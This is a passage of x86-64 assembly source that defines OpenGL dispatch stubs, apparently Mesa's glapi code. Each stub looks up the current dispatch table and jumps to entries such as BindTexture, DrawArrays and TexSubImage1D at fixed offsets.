 * preserved; %rbp push is alignment padding (odd push count keeps
 * %rsp 16-byte aligned at the call). */
GL_PREFIX(BindTexture):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2456(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	2456(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2456(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	2456(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(BindTexture), .-GL_PREFIX(BindTexture)
	.p2align	4,,15
	.globl GL_PREFIX(ColorPointer)
	.type GL_PREFIX(ColorPointer), @function
/* Dispatch stub, table offset 2464.  Four integer args (%rdi-%rcx)
 * preserved; %rbp push is alignment padding (odd push count keeps
 * %rsp 16-byte aligned at the call). */
GL_PREFIX(ColorPointer):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2464(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2464(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2464(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2464(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ColorPointer), .-GL_PREFIX(ColorPointer)
	.p2align	4,,15
	.globl GL_PREFIX(DisableClientState)
	.type GL_PREFIX(DisableClientState), @function
/* Dispatch stub, table offset 2472.  One integer arg (%rdi) preserved
 * across the lookup call; the single push keeps %rsp 16-aligned. */
GL_PREFIX(DisableClientState):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2472(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2472(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2472(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2472(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(DisableClientState), .-GL_PREFIX(DisableClientState)
	.p2align	4,,15
	.globl GL_PREFIX(DrawArrays)
	.type GL_PREFIX(DrawArrays), @function
/* Dispatch stub, table offset 2480.  Three integer args (%rdi,%rsi,%rdx)
 * preserved across the lookup call; odd push count keeps %rsp 16-aligned. */
GL_PREFIX(DrawArrays):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2480(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2480(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2480(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2480(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(DrawArrays), .-GL_PREFIX(DrawArrays)
	.p2align	4,,15
	.globl GL_PREFIX(DrawElements)
	.type GL_PREFIX(DrawElements), @function
/* Dispatch stub, table offset 2488.  Four integer args (%rdi-%rcx)
 * preserved; %rbp push is alignment padding (odd push count keeps
 * %rsp 16-byte aligned at the call). */
GL_PREFIX(DrawElements):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2488(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2488(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2488(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2488(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(DrawElements), .-GL_PREFIX(DrawElements)
	.p2align	4,,15
	.globl GL_PREFIX(EdgeFlagPointer)
	.type GL_PREFIX(EdgeFlagPointer), @function
/* Dispatch stub, table offset 2496.  Two integer args (%rdi,%rsi)
 * preserved; %rbp push is alignment padding (odd push count keeps
 * %rsp 16-byte aligned at the call). */
GL_PREFIX(EdgeFlagPointer):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2496(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	2496(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2496(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	2496(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(EdgeFlagPointer), .-GL_PREFIX(EdgeFlagPointer)
	.p2align	4,,15
	.globl GL_PREFIX(EnableClientState)
	.type GL_PREFIX(EnableClientState), @function
/* Dispatch stub, table offset 2504.  One integer arg (%rdi) preserved
 * across the lookup call; the single push keeps %rsp 16-aligned. */
GL_PREFIX(EnableClientState):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2504(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2504(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2504(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2504(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(EnableClientState), .-GL_PREFIX(EnableClientState)
	.p2align	4,,15
	.globl GL_PREFIX(IndexPointer)
	.type GL_PREFIX(IndexPointer), @function
/* Dispatch stub, table offset 2512.  Three integer args (%rdi,%rsi,%rdx)
 * preserved across the lookup call; odd push count keeps %rsp 16-aligned. */
GL_PREFIX(IndexPointer):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2512(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2512(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2512(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2512(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(IndexPointer), .-GL_PREFIX(IndexPointer)
	.p2align	4,,15
	.globl GL_PREFIX(Indexub)
	.type GL_PREFIX(Indexub), @function
/* Dispatch stub, table offset 2520.  One integer arg (%rdi) preserved
 * across the lookup call; the single push keeps %rsp 16-aligned. */
GL_PREFIX(Indexub):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2520(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2520(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2520(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2520(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Indexub), .-GL_PREFIX(Indexub)
	.p2align	4,,15
	.globl GL_PREFIX(Indexubv)
	.type GL_PREFIX(Indexubv), @function
/* Dispatch stub, table offset 2528.  One pointer arg (%rdi) preserved
 * across the lookup call; the single push keeps %rsp 16-aligned. */
GL_PREFIX(Indexubv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2528(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2528(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2528(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2528(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Indexubv), .-GL_PREFIX(Indexubv)
	.p2align	4,,15
	.globl GL_PREFIX(InterleavedArrays)
	.type GL_PREFIX(InterleavedArrays), @function
/* Dispatch stub, table offset 2536.  Three integer args (%rdi,%rsi,%rdx)
 * preserved across the lookup call; odd push count keeps %rsp 16-aligned. */
GL_PREFIX(InterleavedArrays):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2536(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2536(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2536(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2536(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(InterleavedArrays), .-GL_PREFIX(InterleavedArrays)
	.p2align	4,,15
	.globl GL_PREFIX(NormalPointer)
	.type GL_PREFIX(NormalPointer), @function
/* Dispatch stub, table offset 2544.  Three integer args (%rdi,%rsi,%rdx)
 * preserved across the lookup call; odd push count keeps %rsp 16-aligned. */
GL_PREFIX(NormalPointer):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2544(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2544(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2544(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2544(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(NormalPointer), .-GL_PREFIX(NormalPointer)
	.p2align	4,,15
	.globl GL_PREFIX(PolygonOffset)
	.type GL_PREFIX(PolygonOffset), @function
/* Dispatch stub, table offset 2552.  Two FP args spilled from
 * %xmm0-%xmm1 into a 24-byte frame (16 spill + 8 pad keeps %rsp
 * 16-byte aligned at the call) across the dispatch lookup. */
GL_PREFIX(PolygonOffset):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2552(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	2552(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2552(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	call	_glapi_get_dispatch
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	2552(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(PolygonOffset), .-GL_PREFIX(PolygonOffset)
	.p2align	4,,15
	.globl GL_PREFIX(TexCoordPointer)
	.type GL_PREFIX(TexCoordPointer), @function
/* Dispatch stub, table offset 2560.  Four integer args (%rdi-%rcx)
 * preserved; %rbp push is alignment padding (odd push count keeps
 * %rsp 16-byte aligned at the call). */
GL_PREFIX(TexCoordPointer):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2560(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2560(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2560(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2560(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(TexCoordPointer), .-GL_PREFIX(TexCoordPointer)
	.p2align	4,,15
	.globl GL_PREFIX(VertexPointer)
	.type GL_PREFIX(VertexPointer), @function
/* Dispatch stub, table offset 2568.  Four integer args (%rdi-%rcx)
 * preserved; %rbp push is alignment padding (odd push count keeps
 * %rsp 16-byte aligned at the call). */
GL_PREFIX(VertexPointer):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2568(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2568(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2568(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2568(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexPointer), .-GL_PREFIX(VertexPointer)
	.p2align	4,,15
	.globl GL_PREFIX(AreTexturesResident)
	.type GL_PREFIX(AreTexturesResident), @function
/* Dispatch stub, table offset 2576.  Three integer args (%rdi,%rsi,%rdx)
 * preserved across the lookup call; odd push count keeps %rsp 16-aligned. */
GL_PREFIX(AreTexturesResident):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2576(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2576(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2576(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2576(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(AreTexturesResident), .-GL_PREFIX(AreTexturesResident)
	.p2align	4,,15
	.globl GL_PREFIX(CopyTexImage1D)
	.type GL_PREFIX(CopyTexImage1D), @function
/* Dispatch stub, table offset 2584.  Six integer args (%rdi-%r9)
 * preserved; %rbp push is alignment padding (odd push count keeps
 * %rsp 16-byte aligned at the call). */
GL_PREFIX(CopyTexImage1D):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2584(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2584(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2584(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2584(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CopyTexImage1D), .-GL_PREFIX(CopyTexImage1D)
	.p2align	4,,15
	.globl GL_PREFIX(CopyTexImage2D)
	.type GL_PREFIX(CopyTexImage2D), @function
/* Dispatch stub, table offset 2592.  Six integer args (%rdi-%r9)
 * preserved; %rbp push is alignment padding.  Any stack-passed args
 * are untouched and remain valid for the tail-jumped target. */
GL_PREFIX(CopyTexImage2D):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2592(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2592(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2592(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2592(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CopyTexImage2D), .-GL_PREFIX(CopyTexImage2D)
	.p2align	4,,15
	.globl GL_PREFIX(CopyTexSubImage1D)
	.type GL_PREFIX(CopyTexSubImage1D), @function
/* Dispatch stub, table offset 2600.  Six integer args (%rdi-%r9)
 * preserved; %rbp push is alignment padding (odd push count keeps
 * %rsp 16-byte aligned at the call). */
GL_PREFIX(CopyTexSubImage1D):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2600(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2600(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2600(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2600(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CopyTexSubImage1D), .-GL_PREFIX(CopyTexSubImage1D)
	.p2align	4,,15
	.globl GL_PREFIX(CopyTexSubImage2D)
	.type GL_PREFIX(CopyTexSubImage2D), @function
/* Dispatch stub, table offset 2608.  Six integer args (%rdi-%r9)
 * preserved; %rbp push is alignment padding.  Any stack-passed args
 * are untouched and remain valid for the tail-jumped target. */
GL_PREFIX(CopyTexSubImage2D):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2608(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2608(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2608(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2608(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CopyTexSubImage2D), .-GL_PREFIX(CopyTexSubImage2D)
	.p2align	4,,15
	.globl GL_PREFIX(DeleteTextures)
	.type GL_PREFIX(DeleteTextures), @function
/* Dispatch stub, table offset 2616.  Two integer args (%rdi,%rsi)
 * preserved; %rbp push is alignment padding (odd push count keeps
 * %rsp 16-byte aligned at the call). */
GL_PREFIX(DeleteTextures):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2616(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	2616(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2616(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	2616(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(DeleteTextures), .-GL_PREFIX(DeleteTextures)
	.p2align	4,,15
	.globl GL_PREFIX(GenTextures)
	.type GL_PREFIX(GenTextures), @function
/* Dispatch stub, table offset 2624.  Two integer args (%rdi,%rsi)
 * preserved; %rbp push is alignment padding (odd push count keeps
 * %rsp 16-byte aligned at the call). */
GL_PREFIX(GenTextures):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2624(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	2624(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2624(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	2624(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GenTextures), .-GL_PREFIX(GenTextures)
.p2align 4,,15
.globl GL_PREFIX(GetPointerv)
.type GL_PREFIX(GetPointerv), @function
GL_PREFIX(GetPointerv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2632(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2632(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2632(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2632(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetPointerv), .-GL_PREFIX(GetPointerv)
.p2align 4,,15
.globl GL_PREFIX(IsTexture)
.type GL_PREFIX(IsTexture), @function
GL_PREFIX(IsTexture):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2640(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2640(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2640(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2640(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsTexture), .-GL_PREFIX(IsTexture)
.p2align 4,,15
.globl GL_PREFIX(PrioritizeTextures)
.type GL_PREFIX(PrioritizeTextures), @function
GL_PREFIX(PrioritizeTextures):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2648(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2648(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2648(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2648(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PrioritizeTextures), .-GL_PREFIX(PrioritizeTextures)
.p2align 4,,15
.globl GL_PREFIX(TexSubImage1D)
.type GL_PREFIX(TexSubImage1D), @function
GL_PREFIX(TexSubImage1D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2656(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2656(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2656(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2656(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexSubImage1D), .-GL_PREFIX(TexSubImage1D)
.p2align 4,,15
